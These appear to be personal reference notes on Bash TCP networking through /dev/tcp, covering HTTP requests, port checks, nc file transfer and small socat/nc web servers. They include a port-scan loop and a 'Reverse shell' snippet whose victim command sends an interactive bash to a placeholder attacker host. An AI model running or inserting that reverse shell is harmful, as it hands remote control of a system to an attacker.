-------------------------------------------------------------------------------
Using TCP/IP networking in Bash

  https://medium.com/@stefanos.kalandaridis/bash-ing-your-network-f7069ab7c5f4
  https://tldp.org/LDP/abs/html/devref1.html
  https://w0lfram1te.com/exploring-dev-tcp

-------------------------------------------------------------------------------
Network Connections (Pure Bash)

Bash can open network connections, and even download web pages!

Get time (in UTC)

  # Open connection (variable assignment to $web - bash v4.1)
  exec {web}<>/dev/tcp/www.example.com/80

  # Send request (with carriage returns and newlines)
  printf >&$web "%s\r\n" "HEAD http://www.example.com/ HTTP/1.0"
  printf >&$web "\r\n"

  # read the data returned
  while read -r line; do
    echo "$line"
  done <&$web

  # close
  exec {web}>&-

Bash "is port open" test (for pods)
Note: the 2>/dev/null is to make bash quiet about failures

  # The /dev/tcp open must happen inside the command that timeout runs,
  # otherwise the calling shell connects before timeout has even started.
  timeout 0.5 \
    bash -c 'echo -n < /dev/tcp/127.0.0.1/7777' 2>/dev/null && \
      echo "open" || echo "closed"

What ports are open...

  for port in {1..8888}; do
    echo -n 2>/dev/null < /dev/tcp/127.0.0.1/$port &&
      echo "$port/tcp open"
  done

-------------------------------------------------------------------------------
Bash can not do a listen() and accept()

You will need to use something like "netcat" or "socat" to do this.

Or you could use a Bash loadable accept builtin...
  http://git.savannah.gnu.org/cgit/bash.git/tree/examples/loadables/accept.c

This is saved in a directory listed by $BASH_LOADABLES_PATH
such as /usr/lib/bash. It is then loaded with:

  enable accept

-------------------------------------------------------------------------------
File transfer

Bash can not 'listen' on a port (the server side)!
As such ONE of the commands below must be a "nc" listener (server-side)
That one (the server) must be run first

  send
    nc -lvnp 7777 < file.txt
    # OR
    cat file.txt > /dev/tcp/receiver/7777

  receive
    cat < /dev/tcp/sender/7777 > file.txt
    # OR
    nc -lvnp 7777 > file.txt

Reverse shell

  Attacker (see "telnet in shell" below)
    nc -lvnp 80

  Victim (with limited capabilities)
    bash -c 'bash -i >& /dev/tcp/attacker/80 <&1'

-------------------------------------------------------------------------------
Telnet in shell

Alternative to the attacker "nc" in "Reverse shell" above.

Bidirectional with background reader
This could be done a lot better, but shows it is possible.

=======8<--------CUT HERE----------
# Make connection (variable assignment to $telnet - bash v4.1)
exec {telnet}<>/dev/tcp/www.example.com/80

# background read from server and output
while read -r line; do echo "$line"; done <&$telnet &
reader_pid=$!      # PID of the background reader ($! not $?)

# send
printf >&$telnet "%s\n" "HEAD http://www.example.com/ HTTP/1.0"
printf >&$telnet "\n"

exec {telnet}>&-
kill $reader_pid   # precaution
=======8<--------CUT HERE----------

-------------------------------------------------------------------------------
Web server shell script.

Returning a web page of the word: rock, paper, scissors

=======8<--------CUT HERE----------
port=8080
last=0
output=( ROCK PAPER SCISSORS )
while true; do
  #last=$(( RANDOM%3 ))       # random
  #last=$(( ($last+1)%3 ))    # increment
  last=$(( ($last+2)%3 ))     # decrement
  result=${output[$last]}$'\r\n'
  printf "HTTP/1.0 200 OK\r\nContent-Length: %d\r\n\r\n%s" \
         ${#result} "$result" |
    nc -l -p $port >/dev/null
done
=======8<--------CUT HERE----------

WARNING: The above pre-prepares the web page BEFORE the client even connects.

Here is an alternative where we set up a function to handle the request when
it is made (looped fork). There is no feedback between calls though, so no
memory of the past as above.
=======8<--------CUT HERE----------
# Function to calculate a result
send_web_page() {
  output=( ROCK PAPER SCISSORS )
  result=${output[RANDOM%3]}$'\r\n'
  printf "HTTP/1.0 200 OK\r\nContent-Length: %d\r\n\r\n%s" \
         ${#result} "$result"
}
# export function to sub-shells...
export -f send_web_page

# looped forking server, using socat
socat tcp-listen:8080,fork exec:'bash -c send_web_page'
=======8<--------CUT HERE----------

The next step would be some way of reading the actual request so as to
respond to it. That will need a feedback loop, and as such gets into the
realm of 'co-processing'.

See...
  https://dev.to/leandronsp/building-a-web-server-in-bash-part-ii-parsing-http-14kg

-------------------------------------------------------------------------------
Other tools

  nc         a cat program for the network ("netcat")
  tcputils   utilities to send/receive tcp network connections
             includes a "getpeername" program.
  socat      A bi-directional relay client (netcat at ends, socat in middle)
  ssh        run commands on another host or forward connections

-------------------------------------------------------------------------------
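Reading the request (added example)

This example is added here and is not part of the original notes. It sketches
the "next step" from the web server section for the socat variant, relying on
socat's exec: address attaching the client socket to the handler's stdin and
stdout. The names handle_request and respond, and the 5 second / 1024 char /
50 header limits, are assumptions made for this example.

```bash
#!/usr/bin/env bash
# Added example: request-reading handler for the socat forking server.
# handle_request and respond are hypothetical names, not from the notes.

respond() {  # usage: respond "STATUS LINE" "BODY"
  local body="$2"$'\r\n'
  printf 'HTTP/1.0 %s\r\nContent-Length: %d\r\n\r\n%s' "$1" "${#body}" "$body"
}

handle_request() {
  local method path version header count=0
  local output=( ROCK PAPER SCISSORS )
  # Request line: 5 s timeout and 1024-char cap, so a slow or oversized
  # client cannot pin the forked handler. Client data is never eval'd.
  if ! IFS=' ' read -r -t 5 -n 1024 method path version; then
    respond "400 Bad Request" "bad request"; return
  fi
  version=${version%$'\r'}
  # Drain the headers up to the blank line, capping how many we accept.
  while IFS= read -r -t 5 -n 1024 header; do
    header=${header%$'\r'}
    if [[ -z $header ]]; then break; fi
    if (( ++count > 50 )); then
      respond "431 Request Header Fields Too Large" "too many headers"; return
    fi
  done
  if [[ $version != HTTP/1.[01] ]]; then
    respond "400 Bad Request" "bad request"; return
  fi
  if [[ $method != GET ]]; then
    respond "405 Method Not Allowed" "GET only"; return
  fi
  # The path is only compared with fixed strings; it is never used as a
  # file name or handed to another command.
  case $path in
    /) respond "200 OK" "${output[RANDOM % 3]}" ;;
    *) respond "404 Not Found" "not found" ;;
  esac
}

# To serve it with the looped forking server from the notes:
#   export -f respond handle_request
#   socat tcp-listen:8080,fork exec:'bash -c handle_request'
```

-------------------------------------------------------------------------------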